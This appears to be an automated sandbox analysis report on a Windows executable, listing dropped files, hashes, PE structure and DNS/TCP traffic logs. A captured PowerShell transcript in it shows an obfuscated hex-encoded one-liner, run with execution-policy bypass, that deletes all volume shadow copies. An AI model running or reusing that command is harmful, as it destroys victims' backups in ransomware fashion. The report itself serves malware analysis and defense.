                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5w3taum.vrt.psm1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\Documents\20210501\PowerShell_transcript.390120.OOGUKqeP.20210501060116.txt
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1246
                                                    Entropy (8bit):5.339422654733665
                                                    Encrypted:false
                                                    SSDEEP:24:BxSAYxvBnRx2DOXe9oTs5Vj6n8WXHjeTKKjX4CIym1ZJXeoTs5Vj6nknxSAZ+:BZsvhRoOuPLj6HXqDYB1ZMLj6SZZ+
                                                    MD5:9FD16CD42E397D6D6C28F63F47CA2141
                                                    SHA1:5636002FFD1B2BB0167AF9ABF50BF6068C798C66
                                                    SHA-256:C900519AF8A07B16BAFACC901C0C13CE26D2BF656EDCFE14C527943B8188B0AF
                                                    SHA-512:53FD72B5A13C0FD39F94FBDA8C164B999CB65AFDB41B56DCB2FE43EBBA50C21467017CBD1999DBDA48CB0C43F09557BE4D802DB3D5CF3FA1CD5FBD387669BEB0
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210501060117..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 390120 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -ep bypass -c (0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s..Process ID: 1004..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210501060117..**********************..PS>(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7
                                                    C:\bootTel.dat.418990b0
                                                    Process:C:\Users\user\Desktop\rUUR0qQI22.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):224
                                                    Entropy (8bit):7.009843944595821
                                                    Encrypted:false
                                                    SSDEEP:6:ZFSeLyO1z9mLoqzqFhxOCeiS+KHcyFDln:Zce2s8uhxOwS+ny9ln
                                                    MD5:180D7B9056941682005D0FEF63BB0D0C
                                                    SHA1:1F83A48AFE20D3C1E06CBB41A255AED0986791FD
                                                    SHA-256:3D880D670D2D34C94F78096A5ED4B16B1D968C8B30BB573D46A91950E6D99B9E
                                                    SHA-512:8C359954D46F72629DFB0E39FC077A75C8D58D42EA50192C8DE4FBBBCCCC0839F6EBE84FBB28433B2353A6A237CB91D94CE23D51A534F1A223F709B6480287D4
                                                    Malicious:false
                                                    Preview: .....C.T.^.....K".r.....O..#B[...[...FR1a........{C..4..5P`.. .NO..Z..5...W......9...3.@..Q.J3.z...;3....O..9.af..GR.5........&..R.D..mi..r....x..2.%z.1....h.R@.9.?*.....:...W,.0:.N.R.pw.a....C.tL..>f...w....A.
                                                    \Device\Null
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):39
                                                    Entropy (8bit):4.458103180234288
                                                    Encrypted:false
                                                    SSDEEP:3:oNWXp5vXNuy:oNWXpF9uy
                                                    MD5:F2AE8578BDB8EE0BB24FD934FAD89760
                                                    SHA1:3917F76C992C6E5A2E6A539D6C06F9FC0FC4FAAA
                                                    SHA-256:7295267CA3F3402FC8F32C7AFD5013BFADA50277B012787C012E02C8CC999EE9
                                                    SHA-512:EC063562F2D0B236486405CB17C913D9ACA7A2F31E02A4923534264789C5CEA802D655F6BB47C3A8D677D4E36C6D0F1F0918BB80800D0DE78F4F2C70172B4B83
                                                    Malicious:false
                                                    Preview: C:\Users\user\Desktop\rUUR0qQI22.exe..

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):6.255760938368303
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:rUUR0qQI22.exe
                                                    File size:60416
                                                    MD5:9d418ecc0f3bf45029263b0944236884
                                                    SHA1:eeb28144f39b275ee1ec008859e80f215710dc57
                                                    SHA256:151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
                                                    SHA512:82ced42a32f18ede4358459e08bed1adff85d49c952aca7a086571c5b71fd8b3185ea4306abd1f4e639a12f11161f43c73bf6049d76902d365c5a5e4c7e71f3d
                                                    SSDEEP:768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylvD7Y23W58:0x7Fu4/ihrhDTV1ylbcZ58
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w._.................r........................@..........................@......x.....@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4081b5
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x5FE377D3 [Wed Dec 23 17:01:07 2020 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:17a4bd9c95f2898add97f309fc6f9bcd

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007F5638BAB348h
                                                    push 00000000h
                                                    call 00007F5638BAB6A5h
                                                    jmp dword ptr [00409008h]
                                                    jmp dword ptr [00409000h]
                                                    jmp dword ptr [00409004h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x91000x28.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x130000xaec.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x90100x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x10.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x71d30x7200False0.456448739035data6.26875888524IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rdata0x90000x1760x200False0.43359375data3.01371357706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xa0000x844c0x6800False0.565993088942data5.673278586IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                    .reloc0x130000xaec0xc00False0.7861328125data6.50124480291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Imports

                                                    DLLImport
                                                    KERNEL32.dllGetProcAddress, LoadLibraryA, ExitProcess

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    05/01/21-06:01:51.252678ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.1192.168.2.3
                                                    05/01/21-06:01:52.739573ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.1192.168.2.3
                                                    05/01/21-06:01:54.255221ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.1192.168.2.3

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 1, 2021 06:00:50.495765924 CEST49717443192.168.2.3185.105.109.19
                                                    May 1, 2021 06:00:53.536501884 CEST49717443192.168.2.3185.105.109.19
                                                    May 1, 2021 06:00:59.537051916 CEST49717443192.168.2.3185.105.109.19
                                                    May 1, 2021 06:02:10.194205999 CEST49739443192.168.2.3185.105.109.19
                                                    May 1, 2021 06:02:13.209850073 CEST49739443192.168.2.3185.105.109.19
                                                    May 1, 2021 06:02:19.225950956 CEST49739443192.168.2.3185.105.109.19

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 1, 2021 06:00:40.966522932 CEST5062053192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:41.002168894 CEST6493853192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:41.023356915 CEST53506208.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:41.053606033 CEST53649388.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:41.148900032 CEST6015253192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:41.198815107 CEST53601528.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:41.953253984 CEST5754453192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:42.026010990 CEST53575448.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:42.063354969 CEST5598453192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:42.120246887 CEST53559848.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:42.851144075 CEST6418553192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:42.915077925 CEST53641858.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:43.219022036 CEST6511053192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:43.276004076 CEST53651108.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:44.202594042 CEST5836153192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:44.259861946 CEST53583618.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:45.210990906 CEST6349253192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:45.270266056 CEST53634928.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:46.344225883 CEST6083153192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:46.392858982 CEST53608318.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:47.306098938 CEST6010053192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:47.366225004 CEST53601008.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:48.305075884 CEST5319553192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:48.361843109 CEST53531958.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:49.295646906 CEST5014153192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:49.347126961 CEST53501418.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:50.416008949 CEST5302353192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:50.475758076 CEST53530238.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:50.717036963 CEST4956353192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:50.768558025 CEST53495638.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:51.608968019 CEST5135253192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:51.660464048 CEST53513528.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:52.845843077 CEST5934953192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:52.896435976 CEST53593498.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:53.666836977 CEST5708453192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:53.715416908 CEST53570848.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:55.109352112 CEST5882353192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:55.158065081 CEST53588238.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:55.960249901 CEST5756853192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:56.008778095 CEST53575688.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:56.753340960 CEST5054053192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:56.813231945 CEST53505408.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:57.707150936 CEST5436653192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:57.755716085 CEST53543668.8.8.8192.168.2.3
                                                    May 1, 2021 06:00:58.642318964 CEST5303453192.168.2.38.8.8.8
                                                    May 1, 2021 06:00:58.693648100 CEST53530348.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:16.652832031 CEST5776253192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:16.715946913 CEST53577628.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:23.843310118 CEST5543553192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:23.892951965 CEST53554358.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.893771887 CEST5071353192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.897634029 CEST5613253192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.901043892 CEST5898753192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.904541969 CEST5657953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.907874107 CEST6063353192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.910656929 CEST6129253192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.914572001 CEST6361953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.917876959 CEST6493853192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.921426058 CEST6194653192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.923356056 CEST6491053192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.927391052 CEST5212353192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.929951906 CEST5613053192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.933248997 CEST5633853192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.937216043 CEST5942053192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.939582109 CEST5878453192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.942275047 CEST53507138.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.944806099 CEST6397853192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.947837114 CEST6293853192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.949017048 CEST53561328.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.949796915 CEST53589878.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.951611996 CEST5570853192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.953780890 CEST53565798.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.954782963 CEST5680353192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.956371069 CEST53606338.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.960412979 CEST5714553192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.963365078 CEST53612928.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.964839935 CEST53636198.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.971564054 CEST53649388.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.972467899 CEST53619468.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.974160910 CEST53649108.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.978465080 CEST53521238.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.981174946 CEST53561308.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.984406948 CEST53563388.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.988234043 CEST53594208.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.990336895 CEST53587848.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.991772890 CEST5535953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:50.993293047 CEST53639788.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:50.998806000 CEST53629388.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.002805948 CEST53557088.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.005855083 CEST53568038.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.009005070 CEST6412453192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.011784077 CEST53571458.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.015445948 CEST6315053192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.016604900 CEST5327953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.029236078 CEST5364253192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.035084963 CEST5566753192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.040246964 CEST53553598.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.043488979 CEST6247653192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.049494982 CEST4970553192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.052990913 CEST6147753192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.057343960 CEST6163353192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.057506084 CEST53641248.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.061168909 CEST5594953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.063864946 CEST53631508.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.065725088 CEST5760153192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.067914963 CEST53532798.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.070247889 CEST4934253192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.074764967 CEST5543953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.078885078 CEST5706953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.080574036 CEST53536428.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.083612919 CEST53556678.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.083661079 CEST6397553192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.088715076 CEST5663953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.091912031 CEST53624768.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.093346119 CEST5185653192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.098010063 CEST53497058.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.098615885 CEST5654653192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.101469994 CEST53614778.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.104226112 CEST6215253192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.105896950 CEST53616338.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.108844042 CEST5347053192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.109612942 CEST53559498.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.112548113 CEST5551553192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.114151001 CEST53576018.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.121582031 CEST53493428.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.123229027 CEST53554398.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.130232096 CEST53570698.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.134908915 CEST53639758.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.140394926 CEST53566398.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.142889023 CEST53518568.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.151442051 CEST53565468.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.156848907 CEST53621528.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.158965111 CEST53534708.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.162628889 CEST53555158.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.240881920 CEST6454753192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.248117924 CEST5485653192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.258435011 CEST6414053192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.263031960 CEST6227153192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.272082090 CEST5740453192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.279566050 CEST5771253192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.288979053 CEST6470053192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.289503098 CEST53645478.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.296616077 CEST53548568.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.299921989 CEST5372453192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.307018995 CEST53641408.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.307804108 CEST5805153192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.311583042 CEST53622718.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.315642118 CEST5049153192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.320740938 CEST53574048.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.325706005 CEST5252953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.328052998 CEST53577128.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.337141037 CEST6272453192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.337508917 CEST53647008.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.344819069 CEST5605953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.349069118 CEST53537248.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.354617119 CEST6306053192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.358113050 CEST53580518.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.363224983 CEST5011853192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.365809917 CEST53504918.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.371421099 CEST5807953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.375607967 CEST53525298.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.381490946 CEST4928953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.390072107 CEST53627248.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.391027927 CEST6103453192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.393491983 CEST53560598.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.402148962 CEST5824153192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.403125048 CEST53630608.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.411828995 CEST53501188.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.413296938 CEST6070953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.420103073 CEST53580798.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.426162958 CEST6364353192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.430216074 CEST53492898.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.437124968 CEST6195953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.442437887 CEST53610348.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.453630924 CEST53582418.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.454277992 CEST5098053192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.461910009 CEST53607098.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.470943928 CEST5006753192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.474786043 CEST53636438.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.485667944 CEST53619598.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.487770081 CEST5831953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.511013985 CEST53509808.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.518642902 CEST6478553192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.524205923 CEST53500678.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.532857895 CEST6054853192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.538281918 CEST53583198.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.542237043 CEST5168953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.557326078 CEST4968653192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.565623045 CEST6224153192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.572849035 CEST53647858.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.574126959 CEST5670953192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.585335016 CEST5026353192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.587765932 CEST53605488.8.8.8192.168.2.3
                                                    May 1, 2021 06:01:51.593329906 CEST6437253192.168.2.38.8.8.8
                                                    May 1, 2021 06:01:51.594026089 CEST53516898.8.8.8192.168.2.3
